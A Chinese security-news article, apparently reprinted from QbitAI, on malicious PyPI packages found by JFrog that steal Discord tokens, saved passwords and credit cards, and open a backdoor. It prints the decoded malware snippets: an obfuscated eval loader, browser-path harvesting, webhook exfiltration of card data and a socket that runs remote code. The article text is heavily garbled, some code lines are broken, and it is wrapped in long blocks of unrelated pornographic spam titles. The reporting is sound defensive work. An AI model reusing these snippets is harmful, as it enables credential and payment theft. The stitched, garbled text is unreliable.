精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

PyPI又雙叒叕發(fā)現(xiàn)惡意軟件,能盜取信用卡還有后門程序

新聞 應(yīng)用安全
Python程序員真的要小心了,PyPI軟件庫(kù)問(wèn)題真是越來(lái)越嚴(yán)重。繼今年6月出現(xiàn)挖礦病毒后,PyPI最近再次出現(xiàn)了一批惡意軟件。

[[415370]]

本文經(jīng)AI新媒體量子位(公眾號(hào)ID:QbitAI)授權(quán)轉(zhuǎn)載,轉(zhuǎn)載請(qǐng)聯(lián)系出處。

Python程序員真的要小心了,PyPI軟件庫(kù)問(wèn)題真是越來(lái)越嚴(yán)重。

繼今年6月出現(xiàn)挖礦病毒后,PyPI最近再次出現(xiàn)了一批惡意軟件,

JFrog安全團(tuán)隊(duì)發(fā)現(xiàn),PyPI庫(kù)中有多個(gè)軟件存在盜取信用卡信息遠(yuǎn)程注入代碼的行為,而這些軟件總共被下載了3萬(wàn)次。

這些被發(fā)現(xiàn)問(wèn)題的惡意軟件分別是:

PyPI又雙叒叕發(fā)現(xiàn)惡意軟件,能盜取信用卡還有后門程序

當(dāng)程序員安裝完這些軟件后,它們將在后臺(tái)不知不覺(jué)讀取瀏覽器文件夾,從而盜取信用卡信息和密碼。

它們是如何竊取信用卡信息的

安全研究人員發(fā)現(xiàn),上述所有軟件包都使用Base64編碼進(jìn)行偽裝。

比如上述的noblesse2:

  1. import base64, codecs 
  2. magic = 'aW1wb3J0IGNvbG9yYW1hLCBkYXRldGltZS...' 
  3. love = '0iLKOcY3L4Y2q1nJkxpl97nJE9Y2EyoTI0M...' 
  4. god = 'a2luZy5hcHBlbmQodG9rZW4pDQogICAgICAg...' 
  5. destiny = 'yxIKAVDaAQK3xjpQWkqRAboUcBIzqjEmS...' 
  6. joy = '\x72\x6f\x74\x31\x33' 
  7. trust = eval('\x6d\x61\x67\x69\x63') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64...'
  8. eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'','exec')) 

這種方法可以欺騙一些簡(jiǎn)單的分析工具,但是仔細(xì)研究可以發(fā)現(xiàn)其中的問(wèn)題。

以上8個(gè)軟件包分別包含了以下不同種類的惡意行為:

1、竊取Discord帳戶身份驗(yàn)證token

Discord身份驗(yàn)證token讀取器的代碼非常簡(jiǎn)單,它就是一組硬編碼的路徑:

  1. local = os.getenv('LOCALAPPDATA'
  2. roaming = os.getenv('APPDATA'
  3. paths = { 
  4.     'Discord': roaming + '\\Discord'
  5.     'Discord Canary': roaming + '\\discordcanary'
  6.     'Discord PTB': roaming + '\\discordptb'
  7.     'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default'
  8.     'Opera': roaming + '\\Opera Software\\Opera Stable'
  9.     'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default'
  10.     'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default' 

然后代碼會(huì)讀取這幾種瀏覽器路徑下的所有.log和.ldb文件,并查找Discord身份驗(yàn)證token,結(jié)果通過(guò)Webhook上傳到Discord。

2、竊取瀏覽器存儲(chǔ)的密碼或信用卡數(shù)據(jù)

當(dāng)你在瀏覽器中輸入密碼或信用卡數(shù)據(jù)時(shí),一般都會(huì)跳出如下窗口,提示用戶保存這些信息。

PyPI又雙叒叕發(fā)現(xiàn)惡意軟件,能盜取信用卡還有后門程序

雖然這給用戶帶來(lái)方便,今后不用一遍遍輸入密碼,但缺點(diǎn)是這些信息可能會(huì)惡意軟件獲取。

在這種情況下,惡意軟件會(huì)嘗試從Chrome竊取信用卡信息:

  1. def cs(): 
  2.     master_key = master() 
  3.     login_db = os.environ['USERPROFILE'] + os.sep + \ 
  4.         r'AppData\Local\Google\Chrome\User Data\default\Web Data' 
  5.     shutil.copy2(login_db, 
  6.                  "CCvault.db"
  7.     conn = sqlite3.connect("CCvault.db"
  8.     cursor = conn.cursor() 
  9.     try
  10.         cursor.execute("SELECT * FROM credit_cards"
  11.         for r in cursor.fetchall(): 
  12.             username = r[1
  13.             encrypted_password = r[4
  14.             decrypted_password = dpw( 
  15.                 encrypted_password, master_key) 
  16.             expire_mon = r[2
  17.             expire_year = r[3
  18.             hook.send(f"CARD-NAME: " + username + "\nNUMBER: " + decrypted_password + "\nEXPIRY M: " + str(expire_mon) + "\nEXPIRY Y: " + str(expire_year) + "\n" + "*" * 10 + "\n"

這些信息和前一種情況一樣會(huì)通過(guò)Webhook上傳。

3、收集有關(guān)受感染PC的信息:如IP地址、計(jì)算機(jī)名稱和用戶名

除此之外,這些軟件還會(huì)收集Windows許可證密鑰信息、Windows版本以及屏幕截圖。

4、遠(yuǎn)程代碼注入

pytagora和pytagora2這兩個(gè)惡意軟件會(huì)嘗試連接到某個(gè)IP地址9009端口上,然后執(zhí)行Socket中可用的任何Python代碼。

其中混淆的代碼被安全人員解碼成如下片段:

  1. import socket,struct,time 
  2. s=socket.socket(2,socket.socket.socket.SOCK_STREAM) 
  3. s.connect(('172.16.60.80',9009)) 
  4. l=struct.unpack('>I',s.recv(4))[0
  5. print (l) 
  6. d=s.recv(l) 
  7. print (d) 
  8. while len(d)>!1
  9. d+=s.recv(l-len(d)) 
  10. print (d) 
  11. exec(d,{'s':s}) 

但是安全人員現(xiàn)在不知道這個(gè)IP地址是什么,或者上面是否存在惡意軟件。

中毒后如何挽救

如果你發(fā)現(xiàn)自己的電腦已經(jīng)安裝了諸如noblesse的惡意軟件,那么請(qǐng)檢查一下你的瀏覽器到底保存了哪些密碼,這些密碼可能已經(jīng)泄露,請(qǐng)盡快修改。

對(duì)于Edge瀏覽器用戶,請(qǐng)?jiān)诘刂窓谥休斎雃dge://settings/passwords,查看已保存的密碼。

對(duì)于Chrome瀏覽器用戶,請(qǐng)?jiān)诘刂窓谥休斎隿hrome://settings/payments,在付款方式一欄下查看已保存的信用卡信息。

另外可以松口氣的是,PyPI維護(hù)人員已經(jīng)刪除了這些惡意軟件包。

雖然PyPI軟件庫(kù)現(xiàn)在是安全了,但是鑒于這些開(kāi)源軟件庫(kù)現(xiàn)在的維護(hù)狀態(tài),未來(lái)很可能還會(huì)遇到更多攻擊。今年P(guān)yPI庫(kù)出現(xiàn)安全問(wèn)題的狀況就不止一次出現(xiàn)。

[[415371]]

“攻擊者能夠使用簡(jiǎn)單的混淆技術(shù)來(lái)引入惡意軟件,這意味著開(kāi)發(fā)人員必須保持警惕。”

JFrog CTO說(shuō),“這是一個(gè)系統(tǒng)性威脅,需要由軟件存儲(chǔ)庫(kù)的維護(hù)者和開(kāi)發(fā)人員在多個(gè)層面積極解決。”

 

 

責(zé)任編輯:張燕妮 來(lái)源: 量子位
相關(guān)推薦

2021-08-05 06:22:02

惡意軟件Python軟件信用卡

2017-03-13 16:58:05

戴爾

2018-11-08 17:57:22

華為

2021-10-30 19:01:17

磁盤(pán)字節(jié)文件

2025-02-20 12:00:13

React前端React 19

2021-08-04 09:24:58

PyPI惡意軟件漏洞

2024-12-06 14:58:22

2024-04-03 15:41:53

服務(wù)器

2025-04-08 09:29:55

2020-05-18 13:23:59

寧暢

2023-01-10 11:37:22

Python 庫(kù)PySnooper項(xiàng)目

2018-01-17 16:36:40

Windows 10Windows免費(fèi)升級(jí)

2018-04-13 11:14:42

2017-11-21 10:13:11

微軟打印機(jī)補(bǔ)丁

2022-08-10 18:20:25

信用卡竊取新加坡網(wǎng)絡(luò)釣魚(yú)

2021-02-22 10:04:10

黑客Google AppsCSP

2020-09-01 11:00:14

UltraRank惡意代碼網(wǎng)絡(luò)攻擊

2023-12-15 09:19:44

百度飛槳文心大模型大模型

2022-08-10 18:23:39

Python軟件包索引惡意軟件

2020-03-27 22:29:16

信息安全網(wǎng)絡(luò)攻擊東京奧運(yùn)會(huì)
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

五月婷婷激情综合| 国产成人福利片| 亚洲视频日韩精品| 北条麻妃视频在线| yes4444视频在线观看| 久久综合图片| 中文字幕在线看视频国产欧美在线看完整 | 国产成人一级电影| 欧美精品videos另类日本| 中文字幕天堂网| 欧美激情喷水| 亚洲色图20p| 国产亚洲二区| 最近中文在线观看| 天天插综合网| 亚洲成人久久网| 国产精品亚洲αv天堂无码| a中文在线播放| 国产91精品精华液一区二区三区| 2019av中文字幕| 91制片厂在线| 黄色欧美在线| 欧美日韩高清一区| 欧美一级片免费播放| 国产毛片在线看| 国产精品一二三在| 日本成人在线视频网址| www.99re6| 亚洲网址在线观看| 91黄视频在线观看| 久久艹国产精品| av网页在线| 99视频超级精品| 国产在线视频欧美| 午夜影院在线看| 欧美一区91| 亚洲乱码国产乱码精品精| 天天久久综合网| 电影亚洲精品噜噜在线观看| 亚洲欧美另类图片小说| 日本一区免费观看| 黄片毛片在线看| 六月婷婷色综合| 日本久久亚洲电影| 国产中文字幕免费| 91成人影院| 中文字幕日韩高清| 欧美图片第一页| 国产图片一区| 日韩视频在线永久播放| 国模私拍视频在线观看| 先锋欧美三级| 日韩欧美中文字幕在线播放| 欧美又粗又长又爽做受| 黄色免费网站在线观看| 欧美国产成人在线| 免费影院在线观看一区| 色偷偷在线观看| 国产激情一区二区三区| 成人福利在线视频| 亚洲一区二区色| 日本成人在线一区| 日韩美女在线观看一区| 欧美另类一区二区| 日韩图片一区| 97久久精品人人澡人人爽缅北| 人妻少妇精品一区二区三区| 成人激情电影在线| 国产一区二区欧美日韩| 国产国语性生话播放| 国产一级成人av| 亚洲成人黄色网址| 91传媒理伦片在线观看| 国产毛片久久久| 亚洲国产精品小视频| 永久免费未满蜜桃| 国产精品xxx在线观看| 精品国产青草久久久久福利| 色婷婷一区二区三区在线观看| 黑人一区二区三区| 欧美久久久久中文字幕| 国内自拍第二页| 国产香蕉久久| 91精品国产手机| 久久久久99人妻一区二区三区| 伊人久久大香伊蕉在人线观看热v 伊人久久大香线蕉综合影院首页 伊人久久大香 | 欧美gay视频| 欧美性猛交xxxxx水多| 美女av免费在线观看| 亚洲欧洲日本韩国| 色www精品视频在线观看| av五月天在线| 2020国产精品小视频| 欧美一区二区三区在| 香蕉久久久久久av成人| 欧美日韩精品一区二区三区在线观看| 日韩av在线电影网| 尤物视频最新网址| 婷婷亚洲图片| 欧美激情亚洲视频| 91午夜精品亚洲一区二区三区| 天堂va蜜桃一区二区三区漫画版| 国产精品激情av电影在线观看| 亚洲一级片免费看| 国产成人丝袜美腿| 久久久亚洲综合网站| av亚洲在线| 亚洲一区二区在线播放相泽| 黄色免费视频大全| 国产精品久久乐| 欧美精品一区男女天堂| 中文字幕免费视频| 男人天堂久久久| 亚洲福利电影| 国产精品美腿一区在线看| 97视频免费在线| 成人黄页毛片网站| 日本一区二区不卡高清更新| av电影在线观看网址| 最新热久久免费视频| 成人性生活视频免费看| julia一区二区三区中文字幕| 91精品一区二区三区久久久久久| 亚洲色图欧美日韩| 欧美疯狂party性派对| 97精品久久久| 国产精品久久久久久久久毛片 | 欧美电影精品一区二区| 免费在线观看你懂的| 中文字幕一区二区三区在线视频| 7777kkkk成人观看| 国产农村妇女毛片精品久久| 91视频一区二区三区| 一道本在线观看视频| 欧美大片免费观看网址| 日韩欧美二区三区| 天天操天天舔天天射| 国精品一区二区三区| 国产精品精品一区二区三区午夜版 | 色欲狠狠躁天天躁无码中文字幕 | 亚洲av色香蕉一区二区三区| 国产精品的网站| 无码人妻精品一区二区三区66| 中国av一区| 日韩av成人在线观看| 免费在线国产| 狠狠躁夜夜躁人人爽超碰91| 欧洲一级黄色片| 亚洲欧美日韩国产一区二区| 美脚丝袜一区二区三区在线观看| 欧美少妇精品| 亚洲老头老太hd| 福利网址在线观看| 久久久久国产免费免费| 国产视频一区二区三区在线播放 | 国产一区二区三区四区五区3d| 正在播放亚洲1区| 亚洲视频久久久| 中文字幕视频一区二区三区久| 99中文字幕在线| 欧美日一区二区三区在线观看国产免| 97se在线视频| 国产v日韩v欧美v| 亚洲乱码国产乱码精品精| 亚洲欧美一区二区三区在线观看| 国产午夜精品理论片a级大结局 | 欧美成人app| 最近中文字幕2019免费| 99精品免费观看| 亚洲最新在线观看| 国产麻豆xxxvideo实拍| 亚洲一区中文| 亚洲午夜在线观看| 香蕉成人app| 91禁外国网站| 第一视频专区在线| 欧美一级精品在线| 草久久免费视频| 中文字幕精品在线不卡| 日本一二三四区视频| 亚洲国产激情| 视频三区二区一区| 久久gogo国模啪啪裸体| 97视频网站入口| 最新真实国产在线视频| 日韩免费电影网站| 国产高潮久久久| 国产精品日韩成人| 成熟妇人a片免费看网站| 久久久久国产精品一区二区| 亚洲一区二区免费视频软件合集 | 在线观看的黄色| 色偷偷噜噜噜亚洲男人的天堂| 高清一区二区三区四区| 日本福利一区二区| 国产高潮国产高潮久久久91| 91丨porny丨蝌蚪视频| 亚洲一区日韩精品| 国产日韩欧美一区| 男女激烈动态图| 免费久久久久久久久| 51国偷自产一区二区三区的来源| 欧美大胆成人| 色综合男人天堂| 成人在线观看网站| 日韩av在线免播放器| 国产精品视频a| 色综合久久综合网97色综合| 日本aⅴ在线观看| 欧美激情一区二区三区蜜桃视频| 大桥未久恸哭の女教师| 久久狠狠亚洲综合| 免费观看成人网| 在线视频观看日韩| 国产树林野战在线播放| 国产乱码精品一区二区三区四区| 国产精品果冻传媒潘| 亚洲国产91视频| 国产精品444| 天堂中文av在线资源库| 欧美日韩成人精品| 欧美三级理伦电影| 一区二区三区四区精品| 欧美欧美欧美| 亚洲国产欧美一区二区丝袜黑人| 99精品在线视频观看| 欧美三级一区二区| 日韩欧美国产另类| 欧美日韩亚洲一区二区| 日本熟妇一区二区| 一级日本不卡的影视| 国产午夜精品理论片| 国产精品污网站| 午夜精产品一区二区在线观看的| 99re这里只有精品首页| 亚洲av成人精品一区二区三区| 国产精品综合视频| 少妇愉情理伦片bd| 国产成人精品aa毛片| 黑人性生活视频| 国产一区二区免费在线| 日日干日日操日日射| 国产在线播放一区| 一级做a爱视频| 国产精品综合一区二区三区| 三上悠亚 电影| 久久成人精品无人区| 17c国产在线| 久久精品国产久精国产| www.色就是色.com| 国产一区二区福利| 国产精品偷伦视频免费观看了| 国产精品夜夜嗨| 18深夜在线观看免费视频| 国产成人亚洲综合a∨婷婷 | 粉嫩久久久久久久极品| 国产精品二区三区| 极品束缚调教一区二区网站 | 亚洲h在线观看| 天天插天天操天天干| 欧美视频在线免费看| 欧美日韩一级黄色片| 欧美视频一区二区三区在线观看| 中文字幕无码乱码人妻日韩精品| 欧美午夜影院一区| 亚洲一区二区视频在线播放| 欧美一区二区三区免费视频| 亚洲欧美另类日韩| 亚洲娇小xxxx欧美娇小| 免费在线视频一级不卡| 丝袜情趣国产精品| 色呦呦在线观看视频| 97精品一区二区三区| 欧美日韩在线精品一区二区三区激情综合 | 久久777国产线看观看精品| bl在线肉h视频大尺度| 奇米四色中文综合久久| 欧美高清你懂的| 高清不卡日本v二区在线| 亚洲亚洲免费| 欧美aaa在线观看| 亚洲国产网站| 日本不卡一区二区在线观看| 成人激情小说乱人伦| 一级片视频免费看| 亚洲精品日日夜夜| 欧美a视频在线观看| 日韩视频一区二区三区| 四虎影视在线观看2413| 精品激情国产视频| 国产美女精品写真福利视频| 国产噜噜噜噜噜久久久久久久久| 亚洲日本va午夜在线电影| 日韩精品欧美一区二区三区| 综合视频在线| 成人性做爰aaa片免费看不忠| 国产美女精品一区二区三区| 三级黄色片网站| 一区二区在线观看av| 波多野结衣电影在线播放| 日韩三级.com| 在线免费黄色| 日韩av片免费在线观看| 秋霞一区二区三区| 亚洲国产另类久久久精品极度| 亚洲精品乱码| 亚洲欧美日韩网站| 国产欧美一区二区三区鸳鸯浴| 黄网站免费在线| 91麻豆精品国产91久久久久久 | 国产精品无码免费播放| 日韩精品极品视频| 污视频在线看网站| 国产免费亚洲高清| 国产精品一区二区av日韩在线| 欧妇女乱妇女乱视频| 麻豆国产精品视频| av在线网站观看| 午夜在线成人av| 超碰在线人人干| 久久亚洲精品网站| 国产一区二区主播在线| 欧美日韩一区在线播放| 日韩天堂av| 精品少妇人妻av一区二区三区| 亚洲欧美日韩在线播放| 在线观看视频中文字幕| 一个色综合导航| 日韩三级影视| 欧美日韩高清在线一区| 国产欧美日韩综合一区在线播放 | 亚洲视频网在线直播| 中文字幕av影视| 一区二区三区四区精品| 另类激情视频| 欧美精品一区在线发布| 亚洲中字黄色| 动漫精品一区二区三区| 精品日韩美女的视频高清| 欧美一区二区黄片| 午夜精品福利视频| 牛牛影视久久网| 欧美色图色综合| 久久综合九色综合久久久精品综合| 天天操天天射天天爽| 亚洲高清久久久久久| av3级在线| 欧美成人综合一区| 久久一区二区三区超碰国产精品| 国产又爽又黄无码无遮挡在线观看| 亚洲大片在线观看| 无码国产色欲xxxx视频| 欧美在线视频观看免费网站| 蜜乳av综合| 牛夜精品久久久久久久| 日韩理论片网站| 性欧美18一19性猛交| 国内精品国产三级国产在线专| 国产成人av毛片| 人妻熟女一二三区夜夜爱| 欧美激情一区在线观看| 国产又粗又猛又爽| 欧美成人午夜激情| 老牛影视av一区二区在线观看| 337p粉嫩大胆噜噜噜鲁| 欧美激情在线观看视频免费| 国产三级按摩推拿按摩| 久久久久久com| 九九久久电影| 99re6在线观看| 亚洲一区免费视频| 九色在线免费| 91牛牛免费视频| 国产精品日韩久久久| 99精品欧美一区二区| 日韩一级视频免费观看在线| av毛片午夜不卡高**水| 亚洲国产午夜伦理片大全在线观看网站 | 在线日韩一区| 手机在线观看日韩av| 午夜精品福利一区二区蜜股av| 福利成人在线观看| 亚洲mm色国产网站| 香蕉久久久久久久av网站| 天天操天天摸天天舔| 精品国一区二区三区| 久久久一本精品| 国产又粗又猛又爽又黄的网站| 久久先锋资源网| 99久久精品国产一区色| 国产91精品久久久| 久久精品久久久| 波多野结衣 在线| 日韩一二三区视频| 欧美日韩五码| 精品丰满人妻无套内射| 最新日韩在线视频| 免费黄网站在线观看| 97在线资源站| 美美哒免费高清在线观看视频一区二区|